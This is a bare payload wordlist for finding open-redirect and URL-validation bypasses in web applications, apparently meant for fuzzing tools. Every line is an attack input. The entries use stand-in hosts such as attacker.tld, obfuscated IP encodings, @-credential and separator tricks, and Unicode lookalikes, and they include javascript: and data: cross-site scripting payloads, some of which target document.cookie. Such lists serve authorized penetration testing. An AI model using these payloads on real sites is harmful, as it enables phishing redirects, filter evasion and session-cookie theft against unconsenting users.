
!.attacker.tld
".attacker.tld
";alert(0);//
$.attacker.tld
%.attacker.tld
%01.attacker.tld
%02.attacker.tld
%03.attacker.tld
%04.attacker.tld
%05.attacker.tld
%06.attacker.tld
%07.attacker.tld
%08.attacker.tld
%0b.attacker.tld
%0c.attacker.tld
%0e.attacker.tld
%0f.attacker.tld
%10.attacker.tld
%11.attacker.tld
%12.attacker.tld
%13.attacker.tld
%14.attacker.tld
%15.attacker.tld
%16.attacker.tld
%17.attacker.tld
%18.attacker.tld
%19.attacker.tld
%19Jav%09asc%09ript:https%20://www.google.primevideo.com/%250Aconfirm%25281%2529
%1a.attacker.tld
%1b.attacker.tld
%1c.attacker.tld
%1d.attacker.tld
%1e.attacker.tld
%1f.attacker.tld
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%7f.attacker.tld
&.attacker.tld
'.attacker.tld
(.attacker.tld
).attacker.tld
*.attacker.tld
+.attacker.tld
,.attacker.tld
-.attacker.tld
.attacker.tld
.localdomain.pw
/%09/0177.0.0.01
/%09/0x7f.0.0.0x1
/%09/0x7f.0x0.0x0.0x1
/%09/0x7f000001
/%09/1.1
/%09/2130706433
/%09/attacker.tld
/%09/example.com
/%09/example.com@google.com
/%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
/%09/www.google.primevideo.com@google.com
/%09/www.google.primevideo.com@localdomain.pw
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2flocaldomain.pw
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%5cexample.com@google.com
/%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5clocaldomain.pw
/%5cwww.google.primevideo.com@google.com
/%5cwww.google.primevideo.com@localdomain.pw
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
/.google.com
/.localdomain.pw
//%09/example.com
//%09/example.com@google.com
//%09/google.com
//%09/localdomain.pw
//%09/www.google.primevideo.com@google.com
//%09/www.google.primevideo.com@localdomain.pw
//%2fxgoogle.com
//%5cexample.com
//%5cexample.com@google.com
//%5cgoogle.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5clocaldomain.pw
//%5cwww.google.primevideo.com@google.com
//%5cwww.google.primevideo.com@localdomain.pw
///%09/example.com
///%09/example.com@google.com
///%09/google.com
///%09/localdomain.pw
///%09/www.google.primevideo.com@google.com
///%09/www.google.primevideo.com@localdomain.pw
///%5cexample.com
///%5cexample.com@google.com
///%5cgoogle.com
///%5clocaldomain.pw
///%5cwww.google.primevideo.com@google.com
///%5cwww.google.primevideo.com@localdomain.pw
////%09/example.com
////%09/example.com@google.com
////%09/google.com
////%09/localdomain.pw
////%09/www.google.primevideo.com@google.com
////%09/www.google.primevideo.com@localdomain.pw
////%5cexample.com
////%5cexample.com@google.com
////%5cgoogle.com
////%5clocaldomain.pw
////%5cwww.google.primevideo.com@google.com
////%5cwww.google.primevideo.com@localdomain.pw
/////example.com
/////example.com/
/////google.com/
/////localdomain.pw
/////localdomain.pw/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
////example.com@google.com/
////example.com@google.com/%2e%2e
////example.com@google.com/%2e%2e%2f
////example.com@google.com/%2f%2e%2e
////example.com@google.com/%2f..
////example.com@google.com//
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
////localdomain.pw/
////localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e%2f
////localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f..
////localdomain.pw//
////www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
////www.google.primevideo.com@google.com/
////www.google.primevideo.com@google.com/%2f..
////www.google.primevideo.com@google.com//
////www.google.primevideo.com@localdomain.pw/
////www.google.primevideo.com@localdomain.pw/%2e%2e
////www.google.primevideo.com@localdomain.pw/%2e%2e%2f
////www.google.primevideo.com@localdomain.pw/%2f%2e%2e
////www.google.primevideo.com@localdomain.pw/%2f..
////www.google.primevideo.com@localdomain.pw//
////www.google.primevideo.com@www.google.com/%2e%2e
////www.google.primevideo.com@www.google.com/%2e%2e%2f
////www.google.primevideo.com@www.google.com/%2f%2e%2e
///\;@example.com
///\;@google.com
///\;@localdomain.pw
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
///example.com@google.com/
///example.com@google.com/%2e%2e
///example.com@google.com/%2e%2e%2f
///example.com@google.com/%2f%2e%2e
///example.com@google.com/%2f..
///example.com@google.com//
///google.com
///google.com/
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
///google.com/%2f..
///google.com//
///localdomain.pw
///localdomain.pw/
///localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e%2f
///localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f..
///localdomain.pw//
///www.google.com/%2e%2e
///www.google.com/%2e%2e%2f
///www.google.com/%2f%2e%2e
///www.google.primevideo.com@google.com/
///www.google.primevideo.com@google.com/%2f..
///www.google.primevideo.com@google.com//
///www.google.primevideo.com@localdomain.pw/
///www.google.primevideo.com@localdomain.pw/%2e%2e
///www.google.primevideo.com@localdomain.pw/%2e%2e%2f
///www.google.primevideo.com@localdomain.pw/%2f%2e%2e
///www.google.primevideo.com@localdomain.pw/%2f..
///www.google.primevideo.com@localdomain.pw//
///www.google.primevideo.com@www.google.com/%2e%2e
///www.google.primevideo.com@www.google.com/%2e%2e%2f
///www.google.primevideo.com@www.google.com/%2f%2e%2e
//0177.0.0.01
//0x7f.0.0.0x1
//0x7f.0x0.0x0.0x1
//0x7f000001
//1.1
//2130706433
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@www.google.primevideo.com+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.google.primevideo.com@localdomain.pw/
//;@google.com
//;@localdomain.pw
//XY>.7d8T\205pZM@example.com+@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//XY>.7d8T\205pZM@www.google.primevideo.com+@localdomain.pw/
//XY>.7d8T\205pZM@www.google.primevideo.com@localdomain.pw/
//attacker.tld
//example.com
//example.com+&@google.com#+@example.com/
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//example.com@google.com/
//example.com@google.com/%2e%2e%2f
//example.com@google.com/%2f%2e%2e
//example.com@google.com/%2f..
//example.com@google.com//
//example.com@https:///google.com/%2e%2e
//google%00.com
//google%E3%80%82com
//google.com
//google.com/
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//google.com/%2f..
//google.com//
//google.com:80#@example.com/
//google.com:80?@example.com/
//google.com\@example.com
//google.com\@www.google.primevideo.com
//google.com\texample.com/
//https:///example.com/%2e%2e
//https:///google.com/%2e%2e
//https:///localdomain.pw/%2e%2e
//https:///www.google.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
//https://example.com@google.com/%2e%2e%2f
//https://example.com@google.com//
//https://google.com/%2e%2e%2f
//https://google.com//
//https://localdomain.pw/%2e%2e%2f
//https://localdomain.pw//
//https://www.google.com/%2e%2e%2f
//https://www.google.primevideo.com@google.com//
//https://www.google.primevideo.com@localdomain.pw/%2e%2e%2f
//https://www.google.primevideo.com@localdomain.pw//
//https://www.google.primevideo.com@www.google.com/%2e%2e%2f
//javascript:alert(1)
//javascript:alert(1);
//localdomain%00.pw
//localdomain%E3%80%82pw
//localdomain.pw
//localdomain.pw/
//localdomain.pw/%2e%2e%2f
//localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f..
//localdomain.pw//
//localdomain.pw:80#@www.google.primevideo.com/
//localdomain.pw:80?@www.google.primevideo.com/
//localdomain.pw\@www.google.primevideo.com
//localdomain.pw\twww.google.primevideo.com/
//www.google.com/%2e%2e%2f
//www.google.com/%2f%2e%2e
//www.google.primevideo.com+&@localdomain.pw#+@www.google.primevideo.com/
//www.google.primevideo.com@google.com/
//www.google.primevideo.com@google.com/%2f..
//www.google.primevideo.com@google.com//
//www.google.primevideo.com@https:///localdomain.pw/%2e%2e
//www.google.primevideo.com@https:///www.google.com/%2e%2e
//www.google.primevideo.com@localdomain.pw/
//www.google.primevideo.com@localdomain.pw/%2e%2e%2f
//www.google.primevideo.com@localdomain.pw/%2f%2e%2e
//www.google.primevideo.com@localdomain.pw/%2f..
//www.google.primevideo.com@localdomain.pw//
//www.google.primevideo.com@www.google.com/%2e%2e%2f
//www.google.primevideo.com@www.google.com/%2f%2e%2e
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/\/\/example.com/
/\/example.com/
/\/google.com/
/\/localdomain.pw/
/\0177.0.0.01
/\0x7f.0.0.0x1
/\0x7f.0x0.0x0.0x1
/\0x7f000001
/\1.1
/\2130706433
/\attacker.tld
/example.com/%2f%2e%2e
/google.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http://google.com
/http://localdomain.pw
/http:/example.com
/http:/google.com
/http:/localdomain.pw
/https:/%5cexample.com/
/https:/%5cgoogle.com/
/https:/%5clocaldomain.pw/
/https://%09/example.com
/https://%5cexample.com
/https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5clocaldomain.pw
/https://%5cwww.google.primevideo.com@google.com
/https://%5cwww.google.primevideo.com@localdomain.pw
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///www.google.primevideo.com@localdomain.pw/%2f%2e%2e
/https:///www.google.primevideo.com@www.google.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https://example.com@google.com/
/https://example.com@google.com/%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f..
/https://google.com/
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https://google.com/%2f..
/https://localdomain.pw/
/https://localdomain.pw/%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f..
/https://www.google.com/%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.google.primevideo.com@google.com/
/https://www.google.primevideo.com@google.com/%2f..
/https://www.google.primevideo.com@localdomain.pw/
/https://www.google.primevideo.com@localdomain.pw/%2e%2e
/https://www.google.primevideo.com@localdomain.pw/%2f%2e%2e
/https://www.google.primevideo.com@localdomain.pw/%2f..
/https://www.google.primevideo.com@www.google.com/%2e%2e
/https://www.google.primevideo.com@www.google.com/%2f%2e%2e
/https:example.com
/javascript:alert(1)
/javascript:alert(1);
/localdomain.pw/%2f%2e%2e
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/x:1/:///%01javascript:alert(document.cookie)/
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ｰlocaldomain.pw
;.attacker.tld
<>//google.com
<>//localdomain.pw
<>javascript:alert(1);
=.attacker.tld
@0177.0.0.01
@0x7f.0.0.0x1
@0x7f.0x0.0x0.0x1
@0x7f000001
@1.1
@2130706433
@attacker.tld
@google.com
@localdomain.pw
Javas%26%2399;ript:alert(1)
\/\/google.com/
\/\/localdomain.pw/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
^.attacker.tld
_.attacker.tld
`.attacker.tld
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:www.google.primevideo.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.localdomain.pw
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://3H6k7lIAiqjfNeN@www.google.primevideo.com+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.google.primevideo.com@localdomain.pw/
http://472.314.470.462
http://;@google.com
http://;@localdomain.pw
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://XY>.7d8T\205pZM@www.google.primevideo.com+@localdomain.pw/
http://XY>.7d8T\205pZM@www.google.primevideo.com@localdomain.pw/
http://[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com%2egoogle.com/
http://example.com+&@google.com#+@example.com/
http://example.com:80%40google.com/
http://example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http://example.com@00330.3856078
http://example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http://example.com@3627734734
http://example.com@472.314.470.462
http://example.com@[::216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://google.com%23.example.com/
http://google.com%2f%2f.example.com/
http://google.com%3F.example.com/
http://google.com%5c%5c.example.com/
http://google.com:80#@example.com/
http://google.com:80#@www.google.primevideo.com/
http://google.com:80?@example.com/
http://google.com:80?@www.google.primevideo.com/
http://google.com\texample.com/
http://localdomain.pw%23.www.google.primevideo.com/
http://localdomain.pw%2f%2f.www.google.primevideo.com/
http://localdomain.pw%3F.www.google.primevideo.com/
http://localdomain.pw%5c%5c.www.google.primevideo.com/
http://localdomain.pw:80#@www.google.primevideo.com/
http://localdomain.pw:80?@www.google.primevideo.com/
http://localdomain.pw\twww.google.primevideo.com/
http://www.google.primevideo.com%2elocaldomain.pw/
http://www.google.primevideo.com+&@localdomain.pw#+@www.google.primevideo.com/
http://www.google.primevideo.com:80%40localdomain.pw/
http://www.google.primevideo.com@00330.00072.0000326.00000316
http://www.google.primevideo.com@00330.0x3a.54990
http://www.google.primevideo.com@00330.3856078
http://www.google.primevideo.com@0330.072.0326.0316
http://www.google.primevideo.com@0xd8.072.54990
http://www.google.primevideo.com@0xd8.0x3a.0xd6.0xce
http://www.google.primevideo.com@0xd8.3856078
http://www.google.primevideo.com@0xd83ad6ce
http://www.google.primevideo.com@3627734734
http://www.google.primevideo.com@472.314.470.462
http://www.google.primevideo.com@[::216.58.214.206]
http://www.google.primevideo.com@[::ffff:216.58.214.206]
http://www.localdomain.pw\.www.google.primevideo.com
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:472.314.470.462
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com@00330.00072.0000326.00000316
http:example.com@00330.0x3a.54990
http:example.com@00330.3856078
http:example.com@0330.072.0326.0316
http:example.com@0xd8.072.54990
http:example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.3856078
http:example.com@0xd83ad6ce
http:example.com@3627734734
http:example.com@472.314.470.462
http:example.com@[::216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:www.google.primevideo.com@00330.00072.0000326.00000316
http:www.google.primevideo.com@00330.0x3a.54990
http:www.google.primevideo.com@00330.3856078
http:www.google.primevideo.com@0330.072.0326.0316
http:www.google.primevideo.com@0xd8.072.54990
http:www.google.primevideo.com@0xd8.0x3a.0xd6.0xce
http:www.google.primevideo.com@0xd8.3856078
http:www.google.primevideo.com@0xd83ad6ce
http:www.google.primevideo.com@3627734734
http:www.google.primevideo.com@472.314.470.462
http:www.google.primevideo.com@[::216.58.214.206]
http:www.google.primevideo.com@[::ffff:216.58.214.206]
https://%09/example.com@google.com
https://%09/google.com
https://%09/localdomain.pw
https://%09/www.google.primevideo.com@google.com
https://%09/www.google.primevideo.com@localdomain.pw
https://%5cexample.com@google.com
https://%5cgoogle.com
https://%5clocaldomain.pw
https://%5cwww.google.primevideo.com@google.com
https://%5cwww.google.primevideo.com@localdomain.pw
https:///example.com@google.com/%2e%2e
https:///example.com@google.com/%2f%2e%2e
https:///google.com/%2e%2e
https:///google.com/%2f%2e%2e
https:///localdomain.pw/%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.google.primevideo.com@localdomain.pw/%2e%2e
https:///www.google.primevideo.com@localdomain.pw/%2f%2e%2e
https:///www.google.primevideo.com@www.google.com/%2e%2e
https:///www.google.primevideo.com@www.google.com/%2f%2e%2e
https://0177.0.0.01
https://0x7f.0.0.0x1
https://0x7f.0x0.0x0.0x1
https://0x7f000001
https://1.1
https://2130706433
https://:@google.com\@example.com
https://:@google.com\@www.google.primevideo.com
https://:@localdomain.pw\@www.google.primevideo.com
https://attacker.tld
https://attacker.tld#.target.tld
https://attacker.tld/.target.tld
https://attacker.tld/https://target.tld
https://attacker.tld?.target.tld
https://attacker.tld\.target.tld
https://attacker.tld︖.target.tld
https://attacker.tld﹖.target.tld
https://attacker.tld﹟.target.tld
https://attacker.tld﹨.target.tld
https://attacker.tld＃.target.tld
https://attacker.tld／.target.tld
https://attacker.tld？.target.tld
https://attacker.tld＼.target.tld
https://example.com/https://google.com/
https://example.com@google.com
https://example.com@google.com/
https://example.com@google.com/%2e%2e%2f
https://example.com@google.com/%2f%2e%2e
https://example.com@google.com/%2f..
https://example.com@google.com//
https://google.com
https://google.com/
https://google.com/%2e%2e%2f
https://google.com/%2f%2e%2e
https://google.com/%2f..
https://google.com//
https://localdomain.pw
https://localdomain.pw/
https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f..
https://localdomain.pw//
https://target.tld!.attacker.tld
https://target.tld".attacker.tld
https://target.tld$.attacker.tld
https://target.tld%.attacker.tld
https://target.tld%01.attacker.tld
https://target.tld%02.attacker.tld
https://target.tld%03.attacker.tld
https://target.tld%04.attacker.tld
https://target.tld%05.attacker.tld
https://target.tld%06.attacker.tld
https://target.tld%07.attacker.tld
https://target.tld%08.attacker.tld
https://target.tld%0b.attacker.tld
https://target.tld%0c.attacker.tld
https://target.tld%0e.attacker.tld
https://target.tld%0f.attacker.tld
https://target.tld%10.attacker.tld
https://target.tld%11.attacker.tld
https://target.tld%12.attacker.tld
https://target.tld%13.attacker.tld
https://target.tld%14.attacker.tld
https://target.tld%15.attacker.tld
https://target.tld%16.attacker.tld
https://target.tld%17.attacker.tld
https://target.tld%18.attacker.tld
https://target.tld%19.attacker.tld
https://target.tld%1a.attacker.tld
https://target.tld%1b.attacker.tld
https://target.tld%1c.attacker.tld
https://target.tld%1d.attacker.tld
https://target.tld%1e.attacker.tld
https://target.tld%1f.attacker.tld
https://target.tld%7f.attacker.tld
https://target.tld&.attacker.tld
https://target.tld'.attacker.tld
https://target.tld(.attacker.tld
https://target.tld).attacker.tld
https://target.tld*.attacker.tld
https://target.tld+.attacker.tld
https://target.tld,.attacker.tld
https://target.tld-.attacker.tld
https://target.tld.attacker.tld
https://target.tld:443@0177.0.0.01
https://target.tld:443@0x7f.0.0.0x1
https://target.tld:443@0x7f.0x0.0x0.0x1
https://target.tld:443@0x7f000001
https://target.tld:443@1.1
https://target.tld:443@2130706433
https://target.tld:443@attacker.tld
https://target.tld;.attacker.tld
https://target.tld=.attacker.tld
https://target.tld@attacker.tld
https://target.tld@target.tld@attacker.tld
https://target.tld^.attacker.tld
https://target.tld_.attacker.tld
https://target.tld`.attacker.tld
https://target.tld{.attacker.tld
https://target.tld|.attacker.tld
https://target.tld}.attacker.tld
https://target.tld~.attacker.tld
https://www.google.com/%2e%2e%2f
https://www.google.com/%2f%2e%2e
https://www.google.primevideo.com/https://localdomain.pw/
https://www.google.primevideo.com/https://www.google.com/
https://www.google.primevideo.com@google.com
https://www.google.primevideo.com@google.com/
https://www.google.primevideo.com@google.com/%2f..
https://www.google.primevideo.com@google.com//
https://www.google.primevideo.com@localdomain.pw
https://www.google.primevideo.com@localdomain.pw/
https://www.google.primevideo.com@localdomain.pw/%2e%2e%2f
https://www.google.primevideo.com@localdomain.pw/%2f%2e%2e
https://www.google.primevideo.com@localdomain.pw/%2f..
https://www.google.primevideo.com@localdomain.pw//
https://www.google.primevideo.com@www.google.com/%2e%2e%2f
https://www.google.primevideo.com@www.google.com/%2f%2e%2e
https://wwwxtarget.tld
https:google.com
https:localdomain.pw
jaVAscript://www.google.primevideo.com//%0d%0aalert(1);//
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript://%0aalert(1)
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://www.google.primevideo.com/?z=%0Aalert(1)
javascript://www.google.primevideo.com?%a0alert%281%29
javascript:alert(1)
javascript:alert(1);
{.attacker.tld
|.attacker.tld
}.attacker.tld
~.attacker.tld
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ｰlocaldomain.pw
